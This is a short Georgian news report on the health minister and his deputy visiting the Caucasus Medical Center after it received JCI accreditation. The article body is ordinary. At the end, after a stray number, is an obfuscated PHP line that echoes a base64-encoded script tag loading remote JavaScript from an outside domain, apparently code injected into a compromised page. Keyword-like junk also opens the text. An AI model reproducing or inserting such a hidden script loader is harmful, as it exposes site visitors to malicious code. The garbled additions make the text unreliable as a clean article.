celsiusi
ავერსი შნაიდერი

ჯანდაცვის მინისტრი, კავკასიის მედიცინის ცენტრში იმყოფებოდა, რომელმაც საერთაშორისო აკრედიტაციაა მოიპოვა და Joint Commission International-ის (JCI) აკრედიტებული მულტიპროფილური რეფერალური ჰოსპიტალი გახდა. ამის შესახებ ინფორმაციას საქართველოს ჯანდაცვის სამინისტრო ავრცელებს.

მათი ცნობით, მიხეილ სარჯველაძემ, მინისტრის მოადგილე თეა გიორგაძესთან ერთად, სამედიცინო დაწესებულება დაათვალიერა, შემდეგ კი საერთაშორისო აკრედიტაციის მისაღებად განხორციელებული ცვლილებების შესახებ პრეზენტაციას დაესწრო.

ჯანდაცვის მინისტრმა, ღონისძიებაზე სიტყვით გამოსვლისას აღნიშნა, რომ კლინიკის მიერ, JCI აკრედიტაციის მოპოვება, ძალიან მნიშვნელოვანია, რადგან ეს სიახლე პაციენტის უსაფრთხოების საერთაშორისო სტანდარტების უზრუნველსაყოფის გარანტიაა, რაც თავის მხრივ, სახელმწიფოს ერთ-ერთი მთავარი პრიორიტეტია.

ღონისძიებას ჯანდაცვის სამინისტროსა და სამედიცინო სექტორის წარმომადგენლები და სპეციალურად მოწვეული, სხვა სტუმრები ესწრებოდნენ.

113
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");